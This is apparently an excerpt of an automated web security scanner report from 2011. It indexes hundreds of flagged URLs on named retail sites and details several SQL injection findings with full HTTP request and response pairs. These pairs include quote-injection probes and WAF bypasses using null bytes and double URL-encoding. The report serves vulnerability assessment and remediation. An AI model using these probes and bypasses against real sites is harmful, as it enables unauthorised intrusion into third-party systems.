3.305. http://s7d5.scene7.com/is/image/bluestembrands/4ND9630000010_A_999 [REST URL parameter 4]

3.306. http://s7d5.scene7.com/is/image/bluestembrands/4ND9760000010_A_999 [REST URL parameter 4]

3.307. http://s7d5.scene7.com/is/image/bluestembrands/4NF4230000010_A_999 [REST URL parameter 4]

3.308. http://s7d5.scene7.com/is/image/bluestembrands/4NQ3530000010_A_999 [REST URL parameter 4]

3.309. http://s7d5.scene7.com/is/image/bluestembrands/4NR7550000010_VB_999 [REST URL parameter 4]

3.310. http://s7d5.scene7.com/is/image/bluestembrands/4NR7590000010_A_999 [REST URL parameter 4]

3.311. http://s7d5.scene7.com/is/image/bluestembrands/4NR7650000010_A_999 [REST URL parameter 4]

3.312. http://s7d5.scene7.com/is/image/bluestembrands/4NS4490000010_A_999 [REST URL parameter 4]

3.313. http://s7d5.scene7.com/is/image/bluestembrands/4NS961NNUS055_A_999 [REST URL parameter 4]

3.314. http://s7d5.scene7.com/is/image/bluestembrands/4NT0300000010_VA_999 [REST URL parameter 4]

3.315. http://s7d5.scene7.com/is/image/bluestembrands/4NT3360000010_WVA_999 [REST URL parameter 4]

3.316. http://s7d5.scene7.com/is/image/bluestembrands/4NT3380000010_WVA_999 [REST URL parameter 4]

3.317. http://s7d5.scene7.com/is/image/bluestembrands/4NV962NBRS055_A_999 [REST URL parameter 4]

3.318. http://s7d5.scene7.com/is/image/bluestembrands/4NX0280000010_WVA_999 [REST URL parameter 4]

3.319. http://s7d5.scene7.com/is/image/bluestembrands/4NZ2960000010_VA_999 [REST URL parameter 4]

3.320. http://s7d5.scene7.com/is/image/bluestembrands/4NZ3330000010_A_999 [REST URL parameter 4]

3.321. http://s7d5.scene7.com/is/image/bluestembrands/4NZ3340000010_A_999 [REST URL parameter 4]

3.322. http://s7d5.scene7.com/is/image/bluestembrands/4NZ4500000010_VA_999 [REST URL parameter 4]

3.323. http://s7d5.scene7.com/is/image/bluestembrands/4NZ7280000010_VA_999 [REST URL parameter 4]

3.324. http://s7d5.scene7.com/is/image/bluestembrands/F0661_A_999 [REST URL parameter 4]

3.325. http://s7d5.scene7.com/is/image/bluestembrands/F0670_A_999 [REST URL parameter 4]

3.326. http://s7d5.scene7.com/is/image/bluestembrands/F0688_A_999 [REST URL parameter 4]

3.327. http://s7d5.scene7.com/is/image/bluestembrands/F6554_VA_999 [REST URL parameter 4]

3.328. http://s7d5.scene7.com/is/image/bluestembrands/K4267_A_999 [REST URL parameter 4]

3.329. http://s7d5.scene7.com/is/image/bluestembrands/K7544_VA_999 [REST URL parameter 4]

3.330. http://s7d5.scene7.com/is/image/bluestembrands/K8780_A_999 [REST URL parameter 4]

3.331. http://s7d5.scene7.com/is/image/bluestembrands/N9063_VWB_400 [REST URL parameter 4]

3.332. http://s7d5.scene7.com/is/image/bluestembrands/ND821_VA_999 [REST URL parameter 4]

3.333. http://s7d5.scene7.com/is/image/bluestembrands/NE304_A_999 [REST URL parameter 4]

3.334. http://s7d5.scene7.com/is/image/bluestembrands/NI213_WVA_999 [REST URL parameter 4]

3.335. http://s7d5.scene7.com/is/image/bluestembrands/NK993_VA_999 [REST URL parameter 4]

3.336. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]

3.337. http://s7d5.scene7.com/is/image/bluestembrands/NR780_VA_999 [REST URL parameter 4]

3.338. http://s7d5.scene7.com/is/image/bluestembrands/NS114_VA_999 [REST URL parameter 4]

3.339. http://s7d5.scene7.com/is/image/bluestembrands/P1016_VA_999 [REST URL parameter 4]

3.340. http://scout.clareitysecurity.com/fj9ga/Sat.ashx [id parameter]

3.341. http://scout.clareitysecurity.com/fj9ga/Sat.ashx [sn parameter]

3.342. https://secure.bhphotovideo.com/find/unsubscribeCatalogs.jsp [REST URL parameter 2]

3.343. https://secure.bhphotovideo.com/find/unsubscribeCatalogs.jsp [REST URL parameter 2]

3.344. https://secure.swissmail.org/Generalmail/Dombox/domreg/dom-check.asp [rg parameter]

3.345. http://server.iad.liveperson.net/hc/70582249/ [divID parameter]

3.346. http://smartparents.com/ [name of an arbitrarily supplied request parameter]

3.347. http://smartparents.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.348. http://sv.liveclicker.net/service/api [var parameter]

3.349. http://sv.liveclicker.net/service/getEmbed [div_id parameter]

3.350. http://sv.liveclicker.net/service/getEmbed [name of an arbitrarily supplied request parameter]

3.351. http://sv.liveclicker.net/service/getEmbed [player_custom_id parameter]

3.352. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

3.353. http://ts.istrack.com/trackingAPI.js [vti parameter]

3.354. http://voken.eyereturn.com/ [320863&click parameter]

3.355. http://voken.eyereturn.com/pb/get [320863&click parameter]

3.356. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]

3.357. http://www.abesofmaine.com/ [name of an arbitrarily supplied request parameter]

3.358. http://www.abesofmaine.com/category.do [group1 parameter]

3.359. http://www.abesofmaine.com/category.do [name of an arbitrarily supplied request parameter]

3.360. https://www.abesofmaine.com/accountMenu.do [name of an arbitrarily supplied request parameter]

3.361. http://www.armaniexchange.com/search.do [query parameter]

3.362. http://www.fingerhut.com/catalog/search.cmd [keyword parameter]

3.363. http://www.flyingmule.com/Merchant2/merchant.mvc [Page parameter]

3.364. http://www.gnc.com/search/controller.jsp [kw parameter]

3.365. http://www.gnc.com/search/index.jsp [origkw parameter]

3.366. http://www.gnc.com/search/noResults.jsp [origkw parameter]

3.367. http://www.hertzfurniture.com/45-years.html [REST URL parameter 1]

3.368. http://www.hertzfurniture.com/45-years.html [REST URL parameter 1]

3.369. http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html [REST URL parameter 1]

3.370. http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html [REST URL parameter 1]

3.371. http://www.hertzfurniture.com/Library-Furniture--20--no.html [REST URL parameter 1]

3.372. http://www.hertzfurniture.com/Library-Furniture--20--no.html [REST URL parameter 1]

3.373. http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html [REST URL parameter 1]

3.374. http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html [REST URL parameter 1]

3.375. http://www.hertzfurniture.com/Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html [REST URL parameter 1]

3.376. http://www.hertzfurniture.com/Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html [REST URL parameter 1]

3.377. http://www.hertzfurniture.com/cart.php [REST URL parameter 1]

3.378. http://www.hertzfurniture.com/cart.php [REST URL parameter 1]

3.379. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]

3.380. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]

3.381. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 1]

3.382. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 1]

3.383. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 2]

3.384. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 2]

3.385. http://www.hertzfurniture.com/church-furniture.html [REST URL parameter 1]

3.386. http://www.hertzfurniture.com/church-furniture.html [REST URL parameter 1]

3.387. http://www.hertzfurniture.com/css/ie.css [REST URL parameter 2]

3.388. http://www.hertzfurniture.com/css/ie.css [REST URL parameter 2]

3.389. http://www.hertzfurniture.com/css/ie7.css [REST URL parameter 2]

3.390. http://www.hertzfurniture.com/css/ie7.css [REST URL parameter 2]

3.391. http://www.hertzfurniture.com/css/jqModalDef.css [REST URL parameter 2]

3.392. http://www.hertzfurniture.com/css/jqModalDef.css [REST URL parameter 2]

3.393. http://www.hertzfurniture.com/css/livebar.css [REST URL parameter 2]

3.394. http://www.hertzfurniture.com/css/livebar.css [REST URL parameter 2]

3.395. http://www.hertzfurniture.com/css/modelpage.css [REST URL parameter 2]

3.396. http://www.hertzfurniture.com/css/modelpage.css [REST URL parameter 2]

3.397. http://www.hertzfurniture.com/css/styles.css [REST URL parameter 2]

3.398. http://www.hertzfurniture.com/css/styles.css [REST URL parameter 2]

3.399. http://www.hertzfurniture.com/favicon.ico [REST URL parameter 1]

3.400. http://www.hertzfurniture.com/favicon.ico [REST URL parameter 1]

3.401. http://www.hertzfurniture.com/images/live_person/repoffline.gif [REST URL parameter 3]

3.402. http://www.hertzfurniture.com/images/live_person/repoffline.gif [REST URL parameter 3]

3.403. http://www.hertzfurniture.com/search-complete.php [REST URL parameter 1]

3.404. http://www.hertzfurniture.com/search-complete.php [REST URL parameter 1]

3.405. http://www.hertzfurniture.com/search.php [REST URL parameter 1]

3.406. http://www.hertzfurniture.com/search.php [REST URL parameter 1]

3.407. http://www.hertzfurniture.com/search.php [REST URL parameter 1]

3.408. http://www.hertzfurniture.com/search.php [find-box parameter]

3.409. http://www.hertzfurniture.com/search.php [find-box parameter]

3.410. http://www.hertzfurniture.com/search.php [find-box parameter]

3.411. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]

3.412. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]

3.413. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]

3.414. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]

3.415. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]

3.416. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]

3.417. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [d parameter]

3.418. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iheight parameter]

3.419. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iheight parameter]

3.420. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iwidth parameter]

3.421. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iwidth parameter]

3.422. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.423. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

3.424. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

3.425. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zzwindow parameter]

3.426. http://www.mcafeestore.com/store [name of an arbitrarily supplied request parameter]

3.427. http://www.mcafeestore.com/store/mfe/DisplayHomePage [name of an arbitrarily supplied request parameter]

3.428. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK [name of an arbitrarily supplied request parameter]

3.429. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20 [name of an arbitrarily supplied request parameter]

3.430. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.de_DE [name of an arbitrarily supplied request parameter]

3.431. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD [name of an arbitrarily supplied request parameter]

3.432. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD [name of an arbitrarily supplied request parameter]

3.433. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20 [name of an arbitrarily supplied request parameter]

3.434. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_HK [name of an arbitrarily supplied request parameter]

3.435. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.fr_FR [name of an arbitrarily supplied request parameter]

3.436. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.it_IT [name of an arbitrarily supplied request parameter]

3.437. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.nl_NL [name of an arbitrarily supplied request parameter]

3.438. http://www.superbiiz.com/detail.php [name of an arbitrarily supplied request parameter]

3.439. http://www.superbiiz.com/detail.php [name parameter]

3.440. http://www.superbiiz.com/shopcart.php [name of an arbitrarily supplied request parameter]

3.441. http://www.superbiiz.com/testimonial_list.php [name of an arbitrarily supplied request parameter]

3.442. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]

3.443. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]

3.444. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [EdpNo parameter]

3.445. http://www.tigerdirect.ca/cgi-bin/order.asp [EdpNo parameter]

3.446. https://www.tigerdirect.ca/secure/orderlogin.asp [PG parameter]

3.447. http://www.toshibadirect.com/td/b2c/accessories.jsp [name of an arbitrarily supplied request parameter]

3.448. http://www.toshibadirect.com/td/b2c/afin.to [name of an arbitrarily supplied request parameter]

3.449. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]

3.450. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]

3.451. http://www.toshibadirect.com/td/b2c/tv.to [name of an arbitrarily supplied request parameter]

3.452. http://www.trustmarker.com/pres [div parameter]

3.453. http://www.trustmarker.com/pres [k parameter]

3.454. http://www.trustmarker.com/pres [k parameter]

3.455. http://subscriptions.marvel.com/confirm/title.AVE [Referer HTTP header]

3.456. http://subscriptions.marvel.com/confirm/title.AVE [Referer HTTP header]

3.457. http://www.abesofmaine.com/ [Referer HTTP header]

3.458. http://www.abesofmaine.com/category.do [Referer HTTP header]

3.459. https://www.abesofmaine.com/accountMenu.do [Referer HTTP header]

3.460. http://www.acehardware.com/ [Referer HTTP header]

3.461. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

3.462. http://www.acehardware.com/product/close.gif [Referer HTTP header]

3.463. http://www.acehardware.com/product/loading.gif [Referer HTTP header]

3.464. https://www.acehardware.com/acerewards/index.jsp [Referer HTTP header]

3.465. http://www.gnc.com/ [Referer HTTP header]

3.466. http://www.gnc.com/home/index.jsp [Referer HTTP header]

3.467. http://www.pacificgeek.com/ [Referer HTTP header]

3.468. http://www.pacificgeek.com/product.asp [Referer HTTP header]

3.469. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.470. http://www.petco.com/ [ResonanceSegment cookie]

3.471. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [90215357_clogin cookie]

3.472. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [Cart cookie]

3.473. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CartId cookie]

3.474. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CartSave cookie]

3.475. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CoreAt cookie]

3.476. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CoreID6 cookie]

3.477. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [DB cookie]

3.478. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [SessionId cookie]

3.479. http://www.tigerdirect.ca/cgi-bin/order.asp [90215357_clogin cookie]

3.480. http://www.tigerdirect.ca/cgi-bin/order.asp [Cart cookie]

3.481. http://www.tigerdirect.ca/cgi-bin/order.asp [CoreAt cookie]

3.482. http://www.tigerdirect.ca/cgi-bin/order.asp [CoreID6 cookie]

3.483. http://www.tigerdirect.ca/cgi-bin/order.asp [DB cookie]

3.484. http://www.tigerdirect.ca/cgi-bin/order.asp [SessionId cookie]

3.485. http://www.tigerdirect.ca/retailstores/indexca.asp [Cart cookie]

3.486. http://www.tigerdirect.ca/retailstores/indexca.asp [DB cookie]

3.487. http://www.tigerdirect.ca/retailstores/indexca.asp [SessionId cookie]

3.488. http://www.tigerdirect.ca/retailstores/indexca.asp [Warranty cookie]



1. SQL injection  next
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://sales.liveperson.net/hc/52493658/ [lpjson parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/52493658/

Issue detail

The lpjson parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lpjson parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /hc/52493658/?&site=52493658&cmd=mTagInPage&lpCallId=182916069170-434602336725&protV=20&lpjson=1%00'&page=http%3A//www.homedepot.ca/webapp/wcs/stores/servlet/Home%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&id=9974138610&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=513577902630503747; HumanClickSiteContainerID_52493658=STANDALONE; LivePersonID=-5110247826455-1317384175:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQACDDARS=OFBNHBNACGJHMEJFOLMPFDFH; HumanClickACTIVE=1317384173871

Response 1

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 30 Sep 2011 12:04:39 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 105

lpConnLib.Process({"ResultSet": {"lpCallId":"182916069170-434602336725","lpCallError":"ERR-NOVISITOR"}});

Request 2

GET /hc/52493658/?&site=52493658&cmd=mTagInPage&lpCallId=182916069170-434602336725&protV=20&lpjson=1%00''&page=http%3A//www.homedepot.ca/webapp/wcs/stores/servlet/Home%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&id=9974138610&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=513577902630503747; HumanClickSiteContainerID_52493658=STANDALONE; LivePersonID=-5110247826455-1317384175:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQACDDARS=OFBNHBNACGJHMEJFOLMPFDFH; HumanClickACTIVE=1317384173871

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_52493658=STANDALONE; path=/hc/52493658
Set-Cookie: LivePersonID=-5110247826455-1317384278:-1:1317384259:-1:-1; expires=Sat, 29-Sep-2012 12:04:41 GMT; path=/hc/52493658; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 30 Sep 2011 12:04:41 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"182916069170-434602336725","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.2. https://www.mcafeesecure.com/customer/Login.sa [COBRANDID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.mcafeesecure.com
Path:   /customer/Login.sa

Issue detail

The COBRANDID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COBRANDID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /customer/Login.sa HTTP/1.1
Host: www.mcafeesecure.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.mcafeesecure.com/us/products/buy_now.jsp?tab=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: COBRANDID=0'; affclick=A=84996&C=0; resin=1741316618.20480.0000; LANG=EN; CAMEFROM=shop.mcafee.com; __utma=185732405.1804935129.1315595275.1315779448.1317384067.3; __utmb=185732405.11.10.1317384067; __utmc=185732405; __utmz=185732405.1317384067.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=secured%20by%20macafee; adclick=1311-1

Response 1

HTTP/1.1 500 Internal Server Error
Server: ScanAlert
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: text/html
Connection: close
Date: Fri, 30 Sep 2011 12:34:59 GMT
Content-Length: 3072


<html>
<head>
<title>McAfee Secure
</title>
<link rel="stylesheet" type="text/css" href="/css/pci-common.css">
<link rel="stylesheet" type="text/css" href="/css/pci.css">

...[SNIP]...

Request 2

GET /customer/Login.sa HTTP/1.1
Host: www.mcafeesecure.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.mcafeesecure.com/us/products/buy_now.jsp?tab=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: COBRANDID=0''; affclick=A=84996&C=0; resin=1741316618.20480.0000; LANG=EN; CAMEFROM=shop.mcafee.com; __utma=185732405.1804935129.1315595275.1315779448.1317384067.3; __utmb=185732405.11.10.1317384067; __utmc=185732405; __utmz=185732405.1317384067.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=secured%20by%20macafee; adclick=1311-1

Response 2

HTTP/1.1 302 Found
Server: McAfeeSecure
Location: http://www.mcafeesecure.com/Logout.sa?msgId=9
Content-Length: 83
Connection: close
Date: Fri, 30 Sep 2011 12:34:59 GMT

The URL has moved <a href="http://www.mcafeesecure.com/Logout.sa?msgId=9">here</a>

1.3. http://www.mcafeestore.com/store/mfe/en_GB/buy/productID.237091200 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/buy/productID.237091200

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /store/mfe/en_GB/buy'/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859056255,0)
Content-Length: 89067
Date: Fri, 30 Sep 2011 12:44:30 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=AUD&ESIHC=4b937cbd&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage&productID=237091200"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: PRC_000001
   at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:291)
   at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41)
   at
...[SNIP]...

Request 2

GET /store/mfe/en_GB/buy''/productID.237091200 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://www.mcafeestore.com/store?''=&Action=buy&Env=BASE&Locale=en_GB&SiteID=mfe&productID=237091200
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=107758402677,0)
Content-Length: 0
Date: Fri, 30 Sep 2011 12:44:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


1.4. http://www.mcafeestore.com/store/mfe/en_GB/home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mcafeestore.com
Path:   /store/mfe/en_GB/home

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store/mfe/en_GB%2527/home HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64808723200,0)
Content-Length: 24329
Date: Fri, 30 Sep 2011 12:44:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app62
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=GBP&ESIHC=f7b63e21&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=24160400&StyleVersion=38&ceid=176851100&cename=TopHeader&id=ServerErrorPage"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store/mfe/en_GB%2527%2527/home HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: https://www.mcafeestore.com/store?%27%27=&Action=en_GB&Env=BASE&Locale=en_GB&SiteID=mfe&home=
Content-Type: text/plain
